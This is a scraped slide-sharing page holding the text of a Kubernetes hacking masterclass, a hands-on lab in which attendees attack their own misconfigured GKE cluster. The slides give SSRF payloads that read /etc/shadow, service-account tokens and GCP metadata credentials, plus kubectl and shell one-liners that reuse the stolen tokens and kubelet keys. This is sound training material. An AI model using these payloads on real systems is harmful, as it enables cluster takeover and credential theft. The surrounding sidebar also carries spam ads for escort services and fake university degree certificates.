GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfAlina Yurenko
 
Folding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesFolding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesPhilip Schwarz
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...soniya singh
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - InfographicHr365.us smith
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityNeo4j
 
Cloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEECloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEEVICTOR MAESTRE RAMIREZ
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxTier1 app
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptkotipi9215
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackVICTOR MAESTRE RAMIREZ
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...Christina Lin
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWave PLM
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)OPEN KNOWLEDGE GmbH
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataBradBedford3
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureDinusha Kumarasiri
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...OnePlan Solutions
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样umasea
 

Recently uploaded (20)

Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML Diagrams
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfGOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
 
Folding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesFolding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a series
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - Infographic
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered Sustainability
 
Cloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEECloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEE
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.ppt
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStack
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need It
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
 

Appsecco Kubernetes Hacking Masterclass Presentation Slides

  • 1. Appsecco Case Studies 2022 mid-year Some of our work so far in 2022 15th Dec 2023
  • 2. What will we do today? 1. Deploy a GKE cluster in our own accounts and setup some misconfigurations to exploit 2. Talk about some relevant Kubernetes controls for today's masterclass 3. Attack our own setup to exploit RBAC and pod level access to compromise the cluster 4. Q&A o use the Q&A and chat feature, send your questions etc. I will comment/answer as and when I see them.
  • 4. Download the following file and open it in a text editor. DO NOT RUN ANY COMMANDS YET! https://appsecco-masterclass.s3.amazonaws.com/commands.txt Login to Google Cloud Console and in the same browser open a Google CloudShell in a new tab. Make sure your project is selected for CloudShell. https://console.cloud.google.com/ https://shell.cloud.google.com/?show=terminal
  • 5. Make sure you run the commands from the Google CloudShell 1. Run the commands from commands.txt to create your cluster. Read the comments to understand what the commands are doing. 2. Note the IP address printed at the end of the command
  • 7. Kubernetes, and depending on the cloud platform it is run on top of, has multiple security features and controls built into the environment. • As hackers we rely on these to be misconfigured or absent :) We will look at 2 main security/concepts in Kubernetes, relevant to our class today 1. Pod Security Admission 2. Role Based Access Control
  • 8. 1. Let's create 2 namespaces each with a different Pod Security Standard 2. Go to the `~/masterclass/pod-admission-controller-lab` folder and run these commands to create new namespaces o kubectl apply -f restricted-namespace.yaml o kubectl apply -f privileged-namespace.yaml 3. Now attempt to start a privileged pod within each of the namespaces o kubectl get ns o kubectl apply -f nginx-privileged.yaml -n privileged-namespace o kubectl apply -f nginx-privileged.yaml -n restricted-namespace 4. What do you see?
  • 9. Pod Admission Controller – In simple terms • This is code that intercepts requests reaching the API server to verify if the object (pod, namespace etc.) create request passes a list of allowed checks or not. o The list of checks the request is compared against are called the Pod Security Standards o There are 3 standards - privileged, baseline, and restricted
  • 10. Let's enumerate what roles and clusterroles are present in this cluster and how they are bound 1. Enumerate roles within the kube-system namespace o kubectl get roles -n kube-system o kubectl get rolebindings -n kube-system 2. For each of the rolebindings enumerate the subject attached o kubectl get rolebindings <BINDING_NAME> -n kube-system 3. Test the privileges of the discovered service account using o kubectl auth can-i --as=system:serviceaccount:kube-system:cloud- provider --list
  • 11. Let's repeat the same but with clusterroles and clusterrolebindings to see cluster wide RBAC 1. Enumerate clusterroles across the cluster o kubectl get clusterroles o kubectl get clusterrolebindings 2. For the clusterrolebindings that use a privileged clusterrole, enumerate the subject attached o kubectl get clusterrolebindings <BINDING_NAME> 3. Test the privileges of the discovered service account using o kubectl auth can-i --as=system:serviceaccount:apps:default --list
  • 12. Role and ClusterRole and Bindings • An RBAC Role or ClusterRole contains rules that representa set of permissions.Permissions are purely additive (there are no "deny" rules). • A Role always sets permissions within a particular namespace;when you create a Role,you have to specifythe namespace it belongs in. • ClusterRole,is a non-namespaced resourceand applies to the entire cluster. • Bindings allow the Role or ClusterRole to be bound to a subject (users, groups,or service accounts) with a roleRef pointing to the role which gives the subject the specific permissions • If you want to define a role within a namespace,use a Role;if you want to define a role cluster- wide, use a ClusterRole.
  • 15. • All pods will have access to the default service account mounted as a file system object within the pod at o /var/run/secrets/kubernetes.io/serviceaccount/token o /var/run/secrets/kubernetes.io/serviceaccount/ca.crt • We can extract them and use them to interact with the cluster o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes So how do we gain access to this service account or files from the pod?
  • 16. • Let's take a closer look at the app that was deployed • Login to the application using username serveradmin and password monitorworld • What is the app's functionality? • What vulnerability is present here?
  • 17. • The application takes a URL from the user and makes a server side request on the user's behalf o Such a feature, if not protected properly is often vulnerable to Server Side Request Forgeries (SSRF/XSPA) • Depending on the request library used in the server side code, file:// is also a valid request protocol and can be used to read local files! • Try these as input o file:///etc/passwd o file:///etc/shadow
  • 18. • Let's read the token and ca.crt so that we can interact with the cluster using stolen credentials! Save these inside your Google CloudShell. file:///var/run/secrets/kubernetes.io/serviceaccount/token file:///var/run/secrets/kubernetes.io/serviceaccount/ca.crt • Run kubectl with the token and ca.crt to gain access to the cluster using the stolen secret of the service account o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes • Use auth plugin to view your current access with the stolen credentials kubectl auth can-i --token=`cat token` --certificate-authority=ca.crt - -list
  • 19.
  • 21. We can go a little further with our setup in this class. We have an app with SSRF running inside a GKE cluster. You can perform the following additional actions 1. Dump env data. This will reveal env variables that can have secrets,Kubernetes/GKE information etc. • file:///proc/self/environ 2. Read the node Instance Metadata using the SSRF to fetchthe kubelet credentials • http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env 3. Fetch the Google VM instance's compute service account's token and scope to query the underlying cloud platform itself! This is escaping from the cluster to the cloud environment. • http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token • http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scopes • http://169.254.169.254/computeMetadata/v1/project/project-id
  • 23. kube-env from Instance Metadata cat kube-env | grep ^TPM_BOOTSTRAP_CERT | awk '{print $2}' | base64 -d > kubelet.crt cat kube-env | grep ^TPM_BOOTSTRAP_KEY | awk '{print $2}' | base64 -d > kubelet.key cat kube-env | grep ^CA_CERT | awk '{print $2}' | base64 -d > apiserver.crt kubectl auth --client-certificate=kubelet.crt - -client-key=kubelet.key --certificate- authority=apiserver.crt --server=$KUBERNE TES_API_SERVER can-i --list https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-2-8efac412fbc5
  • 24. Google Cloud Compute SA Token Stealing
  • 25. Tear Down the Cluster (to avoid credit wastage) (optional, don't if you want to practice)
  • 26. 1. https://kubernetes.io/docs/concepts/security/pod-security-admission/ 2. https://kubernetes.io/docs/concepts/security/pod-security-standards/ 3. https://kubernetes.io/docs/reference/access-authn-authz/rbac/ 4. https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-1-2b328252954a 5. https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-2-8efac412fbc5 6. https://blog.appsecco.com/hacking-an-aws-hosted-kubernetes-backed-product-and-failing-904cbe0b7c0d 7. https://kloudle.com/blog/part-1-mapping-the-mitre-att-ck-framework-to-your-kubernetes-cluster-initial-access/ 8. https://kloudle.com/academy/simple-steps-to-set-up-a-2-node-kubernetes-cluster-using-kubeadm/ 9. https://kloudle.com/academy/auditing-kubernetes-with-kubeaudit-conducting-an-assessment/ 10. https://kloudle.com/blog/rogue-one-a-certified-kubernetes-administrator-cka-exam-story/ 11. https://kloudle.com/blog/refuting-aws-chain-attack-digging-deeper-into-eks-zero-days-claim/ 12. https://kloudle.com/academy/5-important-security-settings-you-need-to-review-for-your-gke-clusters/ 13. https://kloudle.com/blog/developerweek-europe-2021-walkthrough-of-the-talk-slides-and-audience-questions/ 14. https://cloud.google.com/kubernetes-engine/docs/how-to/protecting-cluster-metadata 15. Hacking Kubernetes Clusters - https://www.youtube.com/watch?v=xDj4_ZI1Y9A 16. Kubernetes 101 - https://www.youtube.com/watch?v=Z5nj6IpNJIM 17. Kubernetes Crash Course for Absolute Beginners - https://youtu.be/s_o8dwzRlu4?t=104
  • 27. Q&A
  • 28. • Riyaz Walikar, Chief Hacker, run the Kubernetes Penetration Testing as a Service at Appsecco • Appsecco is a boutique security consulting company with customers across the world. • Over a decade and half experience with hacking web apps, APIs, mobile, wireless, networks and more lately cloud and containers • Love to teach! Speak and train at a bunch of conferences! https://www.linkedin.com/in/riyazw/ riyaz@appsecco.com | +91 9886042242 https://appsecco.com | https://blog.appsecco.com
  • 29. About Appsecco Pragmatic, holistic, business-focused approach Specialist Cloud and Application Security company Highly experienced and diverse team Assigned multiple CVEs Certified hackers OWASP chapter leads Cloud and Kubernetes security experts Black Hat & Def Con speakers